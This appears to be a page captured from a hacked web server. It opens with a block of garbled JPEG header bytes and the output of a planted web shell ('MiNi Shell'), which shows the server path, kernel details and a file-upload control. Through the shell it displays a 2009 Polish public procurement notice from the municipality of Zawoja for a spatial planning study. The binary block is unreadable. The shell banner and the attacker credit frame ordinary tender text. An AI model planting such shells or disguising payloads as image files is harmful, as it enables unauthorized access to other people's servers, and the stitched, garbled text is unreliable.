JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090422/115260-N-2009.html

<p class="kh_header"><b>Zawoja: Sporządzenie projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego w granicach administracyjnych Gminy Zawoja</b><br>
<b>Numer ogłoszenia: 115260 - 2009; data zamieszczenia: 22.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zawoja , Zawoja 1307, 34-222 Zawoja, woj. małopolskie, tel. 0-33 8775-015, faks 0-33 8775-015.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawoja.ug.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego w granicach administracyjnych Gminy Zawoja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sporządzenie projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego w granicach administracyjnych Gminy Zawoja - zgodnie z przepisami ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (DZ. U. z 2003r. Nr 80 poz. 717 ze zmianami) oraz Uchwałą Nr XXI/133/2008 Rady Gminy Zawoja z dnia 11 kwietnia 2008r. w sprawie przystąpienia do sporządzenia studium uwarunkowań i kierunków zagospodarowania przestrzennego. 

2. Zakresem opracowania jest teren zawarty w granicach administracyjnych Gminy Zawoja, obejmujący wsie Skawica i Zawoja o powierzchni ok. 129 km2.

3. Projekt studium należy wykonać dla terenu całej Gminy - w pełnym zakresie 
merytorycznym. Opracowanie winno uwzględniać wszystkie uwarunkowania, 
o których jest mowa w art. 10 ust. 1 i 2 ustawy o planowaniu i zagospodarowaniu przestrzennym.

4.Opracowanie winno spełniać wszelkie obowiązujące przepisy prawa - co do zakresu 
i formy oraz procedury wykonania, w szczególności ustawy z dnia 27 marca 2003 roku o 
planowaniu i zagospodarowaniu przestrzennym (DZ. U. z 2003r. Nr 80 poz. 717 ze 
zmianami) oraz Rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004r. w sprawie
zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego 
gminy (Dz.U. z 2004r. Nr 118 poz. 1233).

5.Wykonawca działa w imieniu Zamawiającego. 
Jest zobowiązany do wykonania wszelkich czynności niezbędnych do prawidłowego 
i kompletnego przeprowadzenia procedury wynikającej z art.11 oraz art. 12 ust. 2 ustawy o planowaniu i zagospodarowaniu przestrzennym oraz innych przepisów prawa, jak również innych czynności nieokreślonych w w/w przepisach, jakie mogą wyniknąć podczas przeprowadzania procedury.

	W szczególności wykonawca jest zobowiązany do :

1)  		przygotowania ogłoszenia do prasy miejscowej oraz obwieszczenia o podjęciu uchwały o przystąpieniu do sporządzania studium, określając formę, miejsce i termin składania wniosków dotyczących studium, nie krótszy jednak niż 21 dni od dnia ogłoszenia;
2)  		przygotowania zawiadomienia na piśmie o podjęciu uchwały o przystąpieniu do sporządzania studium dla instytucji i organów właściwych do uzgadniania 
i opiniowania projektu studium;
3) 	rozpatrzenia wniosków, o których mowa w pkt 1),
4)  		sporządzenia projektu studium, uwzględniając ustalenia planu zagospodarowania przestrzennego województwa; w przypadku braku planu zagospodarowania przestrzennego województwa lub nie wprowadzenia do planu zagospodarowania przestrzennego województwa zadań rządowych, uwzględnienia ustalenia programów, o których mowa w art. 48 ust. 1ustawy o planowaniu i zagospodarowaniu przestrzennym,
5)  		uzyskania od gminnej - w rozumieniu art. 8 ustawy o planowaniu i zagospodarowaniu przestrzennym - komisji urbanistyczno-architektonicznej opinii o projekcie zmiany studium;
6)  		uzgodnienia projektu studium z zarządem województwa w zakresie jego zgodności z ustaleniami planu zagospodarowania przestrzennego województwa;
7)  		uzgodnienia projektu studium z wojewodą w zakresie jego zgodności 
z ustaleniami programów, o których mowa w art. 48 ust. 1 ustawy o planowaniu i zagospodarowaniu przestrzennym,
 8)  		wystąpienia o opinie dotyczące rozwiązań przyjętych w projekcie studium do:
    a)    starosty powiatowego,
                b)    gmin sąsiednich,
                c)    właściwego wojewódzkiego konserwatora zabytków,
                d)    właściwych organów wojskowych, ochrony granic oraz bezpieczeństwa     
                       państwa,
                e)    właściwego organu administracji geologicznej,
                f)    dyrektora regionalnego zarządu gospodarki wodnej w zakresie 
                       zagospodarowania obszarów narażonych na niebezpieczeństwo powodzi;
                  g)   regionalnego dyrektora ochrony środowiska;
                g)   innych organów i instytucji właściwych do opiniowania projektu zmiany 
                      studium
9) 	wprowadzenia zmian wynikających z uzyskanych opinii i dokonanych uzgodnień;
10) 		przygotowania ogłoszenia, w sposób określony w pkt 1), o wyłożeniu projektu  studium wraz z prognozą oddziaływania na środowisko do publicznego wglądu z jednoczesnym określeniem terminu, w którym osoby prawne i fizyczne oraz jednostki organizacyjne nie posiadające osobowości prawnej będą mogły wnieść uwagi dotyczące projektu zmiany studium w czasie nie krótszym niż 21 dni od dnia zakończenia wyłożenia projektu zmiany . Ustalenie w/w terminów po dokonaniu uzgodnień z Zamawiającym,
11)   uczestniczenia, przeprowadzenia i pełnej obsługi wyłożenia projektu studium do publicznego wglądu w okresie co najmniej 30 dni. Obsługa wyłożenia po dokonaniu uzgodnień z Zamawiającym winna zapewnić sprawne przeprowadzenie tego etapu procedury, 
12) 		przygotowania kompletu materiałów dla Wójta w celu przedstawienia Radzie Gminy do uchwalenia projektu studium wraz z listą nieuwzględnionych uwag, 
 13) 		udziału w posiedzeniach Komisji i Sesjach Rady Gminy oraz innych spotkaniach, 
            których konieczność wyniknie w trakcie procedury,

6.  Projekt studium należy wykonać w skali 1:10 000 na kopii mapy topograficznej
pochodzącej z państwowego zasobu geodezyjnego i kartograficznego.

7.  Do opracowania materiałów planistycznych oraz sporządzenia projektu studium należy 
wykorzystać mapy katastralne z państwowego zasobu geodezyjnego i kartograficznego w 
skali 1:2880.

9.	Materiały geodezyjne na potrzeby opracowania projektu studium Wykonawca pozyska we
własnym zakresie za wyjątkiem map katastralnych.

10.	Opracowanie-studium należy wykonać w ilości: po 6 egzemplarzy w formie
papierowej i elektronicznej - tekst i rysunek. Przed przekazaniem wersji elektronicznej opracowania-studium Wykonawca zobowiązany jest do uzgodnienia z Zamawiającym formatów zapisu i wydruku.

11.	Materiały planistyczne należy  wykonać w ilości: po 5 egzemplarzy w formie
papierowej i elektronicznej. Przed przekazaniem wersji elektronicznej materiałów planistycznych Wykonawca zobowiązany jest do uzgodnienia z Zamawiającym formatów zapisu i wydruku.

11. Dokumentację prac planistycznych należy wykonać w 2 egzemplarzach.

12. Wykonawca jest zobowiązany do uwzględnienia (rozpatrzenia) w procedurze 
wykonywania niniejszego opracowania wszystkich złożonych wniosków do studium, jakie 
wpłynęły do Gminy od zakończenia wykonywania obowiązującego planu miejscowego do 
ogłoszenia i obwieszczenia o podjęciu procedury planistycznej dotyczącej przedmiotowego
opracowania oraz wszystkich innych dotyczących przekształceń terenu.

13. Wszystkich uzgodnień pomiędzy Wykonawcą a Zamawiającym dotyczących 
przedmiotu zamówienia w trakcie jego realizacji, należy dokonywać na piśmie 
w formie notatki podpisanej przez obydwie strony.

14. Zamawiający udostępni Wykonawcy następujące materiały: 
- wnioski, o których mowa w pkt 11,
- obowiązujący miejscowy plan zagospodarowania przestrzennego miejscowości  
Skawica i Zawoja w formie papierowej,
- obowiązujące studium uwarunkowań i kierunków zagospodarowania przestrzennego 
Gminy Zawoja w formie papierowej,
- uchwałę dot . przedmiotowego zamówienia,
oraz udzieli w trakcie wykonywania prac projektowych wszelkich niezbędnych informacji będących w posiadaniu Gminy

ETAPY OPRACOWANIA PROJEKTU STUDIUM BĘDĄCE PRZEDMIOTEM ODREBNYCH ODBIORÓW I ZAPŁATY 
Należy zachować chronologię wykonywania prac przy sporządzaniu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego zgodnie z ustawą z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (DZ. U. z 2003r. Nr 80 poz. 717 ze zmianami) -harmonogram ofertowy realizacji studium winien być dostarczony przez Wykonawcę .


Etap 1: Zebranie materiałów geodezyjnych mapowych, analiza wniosków do studium oraz zebranie i opracowanie materiałów wyjściowych do projektu studium w tym inwentaryzacji urbanistycznej Gminy -   15 % wynagrodzenia.

Etap 2: Opracowanie projektu studium, opiniowanie i uzgadnianie projektu studium  -   35 % wynagrodzenia.

Etap 3: Wyłożenie projektu studium do publicznego wglądu i rozpatrzenie uwag, opracowanie końcowe dokumentacji planistycznej-uchwalenie studium
- 30 % wynagrodzenia.

Etap 4: Pozytywna ocena przez Wojewodę zgodności przedmiotu zamówienia 
z przepisami prawnymi  -   20 % wynagrodzenia.

Uwaga: W/w etapy są wyszczególnione hasłowo i winny zawierać wszelkie czynności określone w ustawie z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (DZ. U. z 2003r. Nr 80 poz. 717 ze zmianami) i rozdziale II SIWZ- Opis przedmiotu zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 20.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 5 000,00 zł (słownie złotych: pięć  tysięcy złotych).
2.	Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
Bank Spółdzielczy w Jordanowie oddz. w Zawoi  Nr 
67 87990001 0020 0200 0101 0005 z dopiskiem WADIUM - STUDIUM
5.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego Urzędzie Gminy Zawoja 34-222 Zawoja 1307  w pok. Nr 5 lub dołączyć do oferty.
7.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	Warunki ogólne:
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki art. 22 ust. 1 PZP Tj.:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżyli ustawy nakładają obowiązek posiadania takich uprawnień;
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1, 2 PZP.

2)	Warunki szczegółowe:
 
a)	 W skład zespołu projektowego mogą wchodzić wyłącznie osoby, z co najmniej 3 letnim doświadczeniem w zakresie projektowania oraz z wymaganymi przez przepisy prawa uprawnieniami.
b)	Wykonali w okresie ostatnich trzech lat usługi odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania w tym:
- minimum jedno uchwalone studium uwarunkowań i kierunków zagospodarowania przestrzennego dla gminy wiejskiej,
- minimum jeden uchwalony plan miejscowy.
c)	Główny projektant musi być członkiem Okręgowej Izby Urbanistów.
d)	Złożyli ofertę w sposób zgodny z wymogami Specyfikacji Istotnych Warunków Zamówienia.

Zamawiający dokona oceny spełnienia warunków na podstawie złożonych dokumentów  stosując zasadę spełnia-niespełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	Oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 (załącznik nr 1 SIWZ) i nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 (załącznik nr 2 SIWZ) ustawy Prawo Zamówień Publicznych, złożone na formularzu zgodnym z treścią wzoru zamieszczonego w Rozdziale III SIWZ, 
2)	Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji  działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3)	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4)	Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5)	Wykaz członków zespołu projektowego - złożony na formularzu zgodnym z załącznikiem nr 3 do Rozdziału III SIWZ zawierający potwierdzenie kwalifikacji członków zespołu i przynależności do branżowych izb samorządu zawodowego,
6)	Dokument potwierdzający przynależność głównego projektanta do Okręgowej Izby Urbanistów
7)	Dowód wpłacenia -wniesienia wadium.
8)	Wykaz usług wskazanych w pkt. 5 ppkt. 2b) SIWZ, złożony na formularzu zgodnym z załącznikiem nr 4 do Rozdziału III SIWZ,
9)	Dokumenty potwierdzające, że wykonane usługi zostały wykonane z należytą starannością.
Wymienione  dokumenty muszą być złożone wraz z ofertą i załącznikiem wymienionym w pkt.10 SIWZ w formie oryginałów lub kserokopii poświadczonych na każdej stronie dokumentu przez Wykonawcę za zgodność z oryginałem (czytelny podpis lub podpis opatrzony imienną pieczęcią).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zawoja.ug.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zawoja
34-222 Zawoja 1307.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2009 godzina 14:00, miejsce: Urząd Gminy Zawoja
34-222 Zawoja 1307
pok. nr 5 Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com